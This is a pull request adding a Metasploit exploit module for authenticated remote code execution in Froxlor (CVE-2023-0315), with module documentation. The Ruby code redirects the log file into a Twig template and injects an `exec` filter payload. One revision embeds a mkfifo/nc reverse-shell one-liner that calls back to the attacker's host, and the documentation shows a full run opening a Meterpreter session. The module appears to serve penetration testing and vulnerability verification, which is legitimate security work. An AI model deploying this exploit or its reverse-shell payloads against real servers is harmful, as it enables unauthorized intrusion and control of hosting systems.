### PR TITLE
Module for authenticated Froxlor RCE (CVE-2023-0315)

### DIFF
--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -1,0 +1,33 @@
+## Vulnerable Application
+
+### Description
+
+### Setup
+Install php 8.1 and MySQL. Download the vulnerable froxlor
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt install php8.1
+sudo apt install php8.1-common php8.1-mysql php8.1-xml php8.1-xmlrpc php8.1-curl php8.1-gd php8.1-imagick php8.1-cli php8.1-dev php8.1-imap php8.1-mbstring php8.1-opcache php8.1-soap php8.1-zip php8.1-redis php8.1-intl php8.1-gmp php8.1-bcmath -y
+wget https://files.froxlor.org/releases/froxlor-2.0.3.tar.gz
+gunzip froxlor-2.0.3.tar.gz
+tar -xvf froxlor-2.0.3.tar
+cd froxlor
+sudo rm /var/www/html/index.html
+sudo cp -R * /var/www/html/
+cd /var/www/html/
+sudo chown -R www-data:www-data
+sudo apt install mysql-server
+sudo systemctl start mysql.service
+sudo mysql
+mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'notpassword';
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/panos_auth_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios  

--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -1,9 +1,13 @@
 ## Vulnerable Application
 
-### Description
+Froxlor is an open source web hosting control panel. Froxlor v2.0.6 and below suffers from a bug that allows
+authenticated users to change the application logs path to any directory on the OS level which the user www-data can
+write without restrictions from the backend which leads to writing a malicious Twig template that the application will
+render. That will lead to achieving a remote command execution under the user www-data.
 
 ### Setup
-Install php 8.1 and MySQL. Download the vulnerable froxlor
+Install php 8.1 and MySQL. Download the vulnerable Froxlor application and place it in Ubuntu's default webroot. The
+below instruction set should be able to be copy and pasted into a terminal in order to deploy a vulnerable application.
 ```
 sudo add-apt-repository ppa:ondrej/php
 sudo apt install php8.1
@@ -21,15 +25,28 @@ sudo mysql
 mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'notpassword';
 ```
 
+## Options
+
+### TARGETURI
+
+The base URI path of Froxlor. **Default: /froxlor**
+
+### WEB_ROOT
+
+The webroot of the Froxlor server. The webroot must be known in order to write the absolute path of the logfile. The
+default options assumes Froxlor is installed on an Ubuntu machine: **Default: /var/www/html**
+
+
 ## Verification Steps
 
 1. Start msfconsole
-1. Do: `use exploit/linux/http/panos_auth_rce`
-1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Do: `use exploit/linux/http/froxlor_log_path_rce`
+1. Set the `RHOSTS`, `LHOST`, `USERNAME`, and `PASSWORD` options
 1. Run the module
 1. Receive a Meterpreter session as the `root` user.
 
-## Scenarios, Ubuntu 20.04, Froxlor 2.0.3 running on Apache, MySQL and PHP 8.1 
+## Scenarios
+### Ubuntu 20.04, Froxlor 2.0.3 running on Apache, MySQL and PHP 8.1
 ```
 msf6 > use exploit/linux/http/froxlor_log_path_rce
 [*] Using exploit/linux/http/froxlor_log_path_rce

--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -11,13 +11,12 @@ sudo apt install php8.1-common php8.1-mysql php8.1-xml php8.1-xmlrpc php8.1-curl
 wget https://files.froxlor.org/releases/froxlor-2.0.3.tar.gz
 gunzip froxlor-2.0.3.tar.gz
 tar -xvf froxlor-2.0.3.tar
-cd froxlor
 sudo rm /var/www/html/index.html
-sudo cp -R * /var/www/html/
+sudo cp -r froxlor /var/www/html/
 cd /var/www/html/
-sudo chown -R www-data:www-data
+sudo chown -R www-data:www-data ./
 sudo apt install mysql-server
-sudo systemctl start mysql.service
+`sudo systemctl start mysql.service`
 sudo mysql
 mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'notpassword';
 ```
@@ -30,4 +29,50 @@ mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'n
 1. Run the module
 1. Receive a Meterpreter session as the `root` user.
 
-## Scenarios  
+## Scenarios, Ubuntu 20.04, Froxlor 2.0.3 running on Apache, MySQL and PHP 8.1 
+```
+msf6 > use exploit/linux/http/froxlor_log_path_rce
+[*] Using exploit/linux/http/froxlor_log_path_rce
+msf6 exploit(linux/http/froxlor_log_path_rce) > set rhosts 172.16.199.140
+rhosts => 172.16.199.140
+msf6 exploit(linux/http/froxlor_log_path_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/froxlor_log_path_rce) > set lport 9191
+lport => 9191
+msf6 exploit(linux/http/froxlor_log_path_rce) > set username admin
+username => admin
+msf6 exploit(linux/http/froxlor_log_path_rce) > set password notpassword
+password => notpassword
+msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 172.16.199.1:9191
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Successful login
+[+] The target appears to be vulnerable. Vulnerable version found: 2.0.3
+[+] Successfully Logged in!
+[+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621
+[+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig
+[*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs
+[+] Injected payload sucessfully
+[*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log
+[*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs
+[*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 172.16.199.140
+[*] Cleaning up...
+[*] Deleting tampered footer.html.twig file
+[*] Rewriting clean footer.html.twig file
+[*] Meterpreter session 3 opened (172.16.199.1:9191 -> 172.16.199.140:50398) at 2023-02-13 18:20:02 -0500
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.16.199.140
+OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -28,7 +28,7 @@ sudo systemctl restart apache2
 ```
 
 After the above completes successfully, navigate to http://localhost/froxlor to finish the web-based portion of the
-installation. Accept the EULA and input the database credentials and then start the application. 
+installation. Accept the EULA and input the database credentials and then start the application.
 
 ## Options
 

--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -23,7 +23,12 @@ sudo apt install mysql-server
 `sudo systemctl start mysql.service`
 sudo mysql
 mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'notpassword';
+mysql> quit;
+sudo systemctl restart apache2
 ```
+
+After the above completes successfully, navigate to http://localhost/froxlor to finish the web-based portion of the
+installation. Accept the EULA and input the database credentials and then start the application. 
 
 ## Options
 

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -113,10 +113,10 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.nil? || res.code != 200
       Exploit::CheckCode::Unknown("Failed to retrieve version info from #{normalize_uri(target_uri.path, version_url)}")
     else
-      match = res.body.match(%r{<span class=\\"d-none d-xl-inline\\">((?:\d\.)+\d)</span>})
-      if match
-        if Rex::Version.new('2.0.6') >= Rex::Version.new(match[1])
-          Exploit::CheckCode::Appears("Vulnerable version found: #{match[1]}")
+      version = res.get_html_document.at('body/span/text()')
+      if version
+        if Rex::Version.new('2.0.6') >= Rex::Version.new(version)
+          Exploit::CheckCode::Appears("Vulnerable version found: #{version}")
         end
       else
         Exploit::CheckCode::Unknown("Failed to version info from #{normalize_uri(target_uri.path, version_url)}")

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    return Exploit::CheckCode::Unknown('Failed to authenticated to Froxlor') unless login
+    return Exploit::CheckCode::Unknown('Failed to authenticate to Froxlor') unless login
 
     version_url = '/lib/ajax.php?action=updatecheck&theme=Froxlor'
     print_good('Successful login')

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -187,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res && res.code == 302 && res.headers['Location']
       if res.headers['Location'] == 'admin_index.php'
-        print_good('Injected payload sucessfully')
+        print_good('Injected payload successfully')
         print_status("Changing log path back to default value while triggering payload: #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")
         change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/logs/froxlor.log")
       end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -93,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
         'keep_cookies' => true
       )
+      print_good('Successful login')
       true
     else
       false
@@ -100,10 +101,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    return Exploit::CheckCode::Unknown('Failed to authenticate to Froxlor') unless login
+    begin
+      @authenticated = login
+    rescue InvalidRequest, InvalidResponse => e
+      return Exploit::CheckCode::Unknown("Failed to authenticate to Froxlor: #{e.class}, #{e}")
+    end
 
     version_url = '/lib/ajax.php?action=updatecheck&theme=Froxlor'
-    print_good('Successful login')
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, version_url),
@@ -193,8 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    fail_with(Failure::NoAccess, 'Failed to login') unless login
-    print_good('Successful login')
+    fail_with(Failure::NoAccess, 'Failed to login') unless @authenticated || login
     @csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')
 
     if change_log_path("#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.nil? || res.code != 200
       fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}")
     else
-      csrf_token =  res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
+      csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
       if csrf_token
         print_good("CSRF token is : #{csrf_token}")
         csrf_token
@@ -247,7 +247,6 @@ class MetasploitModule < Msf::Exploit::Remote
       </footer>
     EOF
     if session.type == 'meterpreter'
-      print_status('Cleaning up...')
       print_status('Deleting tampered footer.html.twig file')
       filename = "#{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig"
       session.fs.file.rm(filename)
@@ -256,14 +255,12 @@ class MetasploitModule < Msf::Exploit::Remote
       fd.write(footer_html_twig)
       fd.close
     else
-      # TODO: fix Unix Command Sessions clean up
-      # idea #1
-      # session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
-      # session.shell_command_token("cat >> #{datastore['WEB_ROOT']}{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig #{footer_html_twig}")
-      # idea #2
-      # session.shell_command_token("sed '/^\\[/d' #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig > #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
-      print_error('NOTE: you must use a meterpreter payload in order to automatically cleanup.')
-      print_error("The file: footer.html.twig won't be restored automatically.")
+      print_status('Cleaning tampered footer.html.twig file')
+      # Remove all log lines added to footer.html.twig by the exploit
+      # (all log lines start with an opening square bracket ex: [2023-02-16 09:08:28] froxlor.INFO: [API] ...)
+      session.shell_command_token("sed '/^\\[/d' #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig > #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp")
+      session.shell_command_token("mv -f #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
+      session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/tmp")
     end
   end
 end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -131,15 +131,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
 
-    if res.nil? || res.code != 200
-      fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}")
-    else
-      csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
-      fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.") unless csrf_token
-
-      print_good("CSRF token is : #{csrf_token}")
-      csrf_token
-    end
+    fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}") unless (!res.nil? || res.code == 200)
+    csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
+    fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.") unless csrf_token
+    print_good("CSRF token is : #{csrf_token}")
+    csrf_token
   end
 
   def change_log_path(new_logfile)
@@ -197,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_error('Login failed') unless login
+    fail_with(Failure::NoAccess, 'Failed to login') unless login
     print_good('Successful login')
     @csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')
 

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -256,8 +256,12 @@ EOF
       fd.write(footer_html_twig)
       fd.close
     else
+      #TODO:
+      # idea #1
       # session.shell_command_token("rm #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
       # session.shell_command_token("cat >> #{datastore['WEB_ROOT']}{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig #{footer_html_twig}")
+      # idea #2
+      # session.shell_command_token("sed '/^\\[/d' #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig > #{datastore['WEB_ROOT']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
       print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
       print_error("The file: footer.html.twig won't be restored automatically.")
     end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -134,10 +134,10 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.nil? || res.code != 200
       fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}")
     else
-      match = res.body.match(/name="csrf-token" content="(\w+)"/)
-      if match
-        print_good("CSRF token is : #{match[1]}")
-        match[1]
+      csrf_token =  res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
+      if csrf_token
+        print_good("CSRF token is : #{csrf_token}")
+        csrf_token
       else
         fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.")
       end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -14,73 +14,67 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'        => 'Froxlor Log Path RCE',
-        'Description' => %q(
+        'Name' => 'Froxlor Log Path RCE',
+        'Description' => %q{
           Froxlor v2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path
           to any directory on the OS level which the user www-data can write without restrictions from the backend which
           leads to writing a malicious Twig template that the application will render. That will lead to achieving a
           remote command execution under the user www-data.
-        ),
-        'Author'      =>
-          [
-            'Askar',      # discovery
-            'jheysel-r7'  # module
-          ],
-        'References'  =>
-          [
-            [ 'URL', 'https://shells.systems/author/askar/'],
-            [ 'CVE', '2023-0315']
-          ],
-        'License'        => MSF_LICENSE,
-        'Platform'       => 'linux',
-        'Privileged'     => true,
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-          },
-        'Arch'           => [ ARCH_CMD ],
+        },
+        'Author' => [
+          'Askar', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://shells.systems/author/askar/'],
+          [ 'CVE', '2023-0315']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Linux ',
             {
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
-              'CmdStagerFlavor' => %i[echo printf],
+              'CmdStagerFlavor' => ['wget'],
               'Type' => :linux_dropper,
               'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
             }
           ],
           [
-            'Unix In-Memory',
+            'Unix Command',
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
               'Type' => :unix_memory,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
             }
           ]
         ],
         'DefaultTarget' => 0,
         'Notes' => {
-         'Stability' => [CRASH_SAFE],
-         'Reliability' => [REPEATABLE_SESSION],
-        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
-         },
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        },
         'DisclosureDate' => '2023-01-29'
       )
     )
 
     register_options(
       [
-        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
-        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'notpassword'])
-      ],
-      )
+        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'admin']),
+        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', '']),
+        OptString.new('TARGETURI', [true, 'The base path to the vulnerable Froxlor instance', '/froxlor']),
+        OptString.new('WEBROOT_DIR', [true, 'The webroot ', '/var/www/html'])
+      ]
+    )
   end
 
   def login
-
-    #TODO this will follow redirects as is, no good
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
@@ -94,6 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && (res.code == 302 && res.headers.include?('Location') && res.headers['Location'] == 'admin_index.php')
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
+        'keep_cookies' => true
+      )
       true
     else
       false
@@ -101,134 +100,166 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    return Exploit::CheckCode::Unknown('Failed to authenticated to Froxlor') unless login
 
-    return Exploit::CheckCode::Appears
-
-    return Exploit::CheckCode::Unknown("Failed to authenticated to Froxlor") unless login
-
+    version_url = '/lib/ajax.php?action=updatecheck&theme=Froxlor'
     print_good('Successful login')
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
-      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, version_url),
+      'keep_cookies' => true
     )
 
-    return Exploit::CheckCode::Unknown("Failed to load /admin_index.php after successful login") unless res&.code == 200
-
-    xml = res.get_xml_document
-
-
+    if res.nil? || res.code != 200
+      Exploit::CheckCode::Unknown("Failed to retrieve version info from #{normalize_uri(target_uri.path, version_url)}")
+    else
+      match = res.body.match(%r{<span class=\\"d-none d-xl-inline\\">((?:\d\.)+\d)</span>})
+      if match
+        if Rex::Version.new('2.0.6') >= Rex::Version.new(match[1])
+          Exploit::CheckCode::Appears("Vulnerable version found: #{match[1]}")
+        end
+      else
+        Exploit::CheckCode::Unknown("Failed to version info from #{normalize_uri(target_uri.path, version_url)}")
+      end
+    end
   end
 
   def get_csrf_token(url)
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, url),
-      'keep_cookies' => true,
-      )
+      'keep_cookies' => true
+    )
 
-    print_error("Failed to get csrf token") unless res&.code == 200
-
-    csrf_token = nil
-    match = res.body.match(/name="csrf-token" content="(\w+)"/)
-    if match
-      csrf_token = match[1]
-      print_good("CSRF token is : #{csrf_token}")
+    if res.nil? || res.code != 200
+      fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}")
     else
-      fail_with(Failure::Unknown, 'There is no CSRF token in HTTP response.')
+      match = res.body.match(/name="csrf-token" content="(\w+)"/)
+      if match
+        print_good("CSRF token is : #{match[1]}")
+        match[1]
+      else
+        fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.")
+      end
     end
-
-    csrf_token
-
   end
 
-  def change_log_path
-
-    csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')
-    new_logfile = '/var/www/html/templates/Froxlor/footer.html.twig'
-
+  def change_log_path(new_logfile)
     mime = Rex::MIME::Message.new
     mime.add_part('0', nil, nil, 'form-data; name="logger_enabled"')
     mime.add_part('1', nil, nil, 'form-data; name="logger_enabled"')
     mime.add_part('2', nil, nil, 'form-data; name="logger_severity"')
     mime.add_part('file', nil, nil, 'form-data; name="logger_logtypes[]"')
     mime.add_part(new_logfile, nil, nil, 'form-data; name="logger_logfile"')
-    mime.add_part('0' , nil, nil, 'form-data; name="logger_log_cron"')
-    mime.add_part(csrf_token, nil, nil, 'form-data; name="csrf_token"')
-    mime.add_part("overview", nil, nil, 'form-data; name="page"')
+    mime.add_part('0', nil, nil, 'form-data; name="logger_log_cron"')
+    mime.add_part(@csrf_token, nil, nil, 'form-data; name="csrf_token"')
+    mime.add_part('overview', nil, nil, 'form-data; name="page"')
     mime.add_part('', nil, nil, 'form-data; name="action"')
     mime.add_part('send', nil, nil, 'form-data; name="send"')
 
-    res2 = send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, '/admin_settings.php?'),
-      'vars_get' => { 'page' => 'overview', 'part' => 'logging'},
+      'uri' => normalize_uri(target_uri.path, '/admin_settings.php?'),
+      'vars_get' => { 'page' => 'overview', 'part' => 'logging' },
       'keep_cookies' => true,
-      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
-      'data'   => mime.to_s
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
     )
 
-    if res2 && res2.code == 200
-      if res2.body.include?("The settings have been successfully saved")
-        return true
-      end
+    if res && res.code == 200 && res.body.include?('The settings have been successfully saved')
+      return true
     end
 
     false
-
   end
 
   def execute_command(cmd, _opts = {})
-    csrf_token = get_csrf_token('/admin_index.php')
-
-    data = {
-      'theme' =>  cmd,
-      'csrf_token' => csrf_token,
-      'page' => "change_theme",
-      'send' => "send",
-      'dosave' => "",
-    }
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
       'keep_cookies' => true,
-      'vars_post' => data
-      )
+      'vars_post' => {
+        'theme' => "{{['#{cmd}']|filter('exec')}}",
+        'csrf_token' => @csrf_token,
+        'page' => 'change_theme',
+        'send' => 'send',
+        'dosave' => ''
+      }
+    )
 
-    if res && res.code == 200 && res.headers['Location']
+    if res && res.code == 302 && res.headers['Location']
       if res.headers['Location'] == 'admin_index.php'
         print_good('Injected payload sucessfully')
+        print_status("Changing log path back to default value while triggering payload: #{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/logs/froxlor.log")
+        change_log_path("#{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/logs/froxlor.log")
       end
+    else
+      print_error('did not inject payload successfully')
     end
-
-    print_status("triggering payload")
-    res2 = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
-      'keep_cookies' => true,
-    )
   end
 
   def exploit
+    print_error('Login failed') unless login
+    print_good('Successful login')
+    @csrf_token = get_csrf_token('/admin_settings.php?page=overview&part=logging')
 
-    print_error("Login failed") unless login
-    print_good('Successfully Logged in!')
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/admin_index.php'),
-      'keep_cookies' => true,
-      )
-
-    if change_log_path
-      print_good('we ou heur')
+    if change_log_path("#{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
+      print_good("Changed logfile path to: #{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
       case target['Type']
       when :unix_memory
-        execute_command("{{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc #{datastore['LHOST']} #{datastore['LPORT']} >/tmp/f']|filter('exec')}}")
+        execute_command(payload.encoded)
       when :linux_dropper
         execute_cmdstager
+      else
+        print_error('Please enter valid target')
       end
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to change the log path. The target might not be exploitable')
     end
   end
 
+  def on_new_session(session)
+    super
+    # Original footer.html.twig file
+    footer_html_twig = <<~EOF
+      <footer class="text-center mb-3">
+              <span>
+                      <img src="{{ basehref|default("") }}templates/Froxlor/assets/img/logo_grey.png" alt="Froxlor"/>
+                      {% if install_mode is not defined  %}
+                              {% if (get_setting('admin.show_version_login') == '1'
+                                      and area == 'login') or (area != 'login'
+                                      and get_setting('admin.show_version_footer') == '1') %}
+                                      {{ call_static('\\Froxlor\\Froxlor', 'getFullVersion') }}
+                              {% endif %}
+                      {% endif %}
+                      &copy; 2009-{{ "now"|date("Y") }} by <a href="https://www.froxlor.org/" rel="external" target="_blank">the Froxlor Team</a><br>
+                      {% if install_mode is not defined %}
+                              {% if (get_setting('panel.imprint_url') != '') %}<a href="{{ get_setting('panel.imprint_url') }}" target="_blank" class="footer-link">{{ lng('imprint') }}</a>{% endif %}
+                              {% if (get_setting('panel.terms_url') != '') %}<a href="{{ get_setting('panel.terms_url') }}" target="_blank" class="footer-link">{{ lng('terms') }}</a>{% endif %}
+                              {% if (get_setting('panel.privacy_url') != '') %}<a href="{{ get_setting('panel.privacy_url') }}" target="_blank" class="footer-link">{{ lng('privacy') }}</a>{% endif %}
+                      {% endif %}
+              </span>
 
+          {% if lng('translator') %}
+                      <br/>
+              <small class="mt-3">{{ lng('panel.translator') }}: {{ lng('translator') }}</small>
+          {% endif %}
+      </footer>
+EOF
+    if session.type == 'meterpreter'
+      print_status('Cleaning up...')
+      print_status('Deleting tampered footer.html.twig file')
+      filename = "#{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig"
+      session.fs.file.rm(filename)
+      fd = session.fs.file.new(filename, 'wb')
+      print_status('Rewriting clean footer.html.twig file')
+      fd.write(footer_html_twig)
+      fd.close
+    else
+      # session.shell_command_token("rm #{datastore['WEBROOT_DIR']}#{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig")
+      # session.shell_command_token("cat >> #{datastore['WEBROOT_DIR']}{datastore['TARGETURI']}/templates/Froxlor/footer.html.twig #{footer_html_twig}")
+      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
+      print_error("The file: footer.html.twig won't be restored automatically.")
+    end
+  end
 end

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -135,12 +135,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}")
     else
       csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
-      if csrf_token
-        print_good("CSRF token is : #{csrf_token}")
-        csrf_token
-      else
-        fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.")
-      end
+      fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.") unless csrf_token
+
+      print_good("CSRF token is : #{csrf_token}")
+      csrf_token
     end
   end
 

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -245,7 +245,7 @@ class MetasploitModule < Msf::Exploit::Remote
               <small class="mt-3">{{ lng('panel.translator') }}: {{ lng('translator') }}</small>
           {% endif %}
       </footer>
-EOF
+    EOF
     if session.type == 'meterpreter'
       print_status('Cleaning up...')
       print_status('Deleting tampered footer.html.twig file')
@@ -256,13 +256,13 @@ EOF
       fd.write(footer_html_twig)
       fd.close
     else
-      #TODO:
+      # TODO: fix Unix Command Sessions clean up
       # idea #1
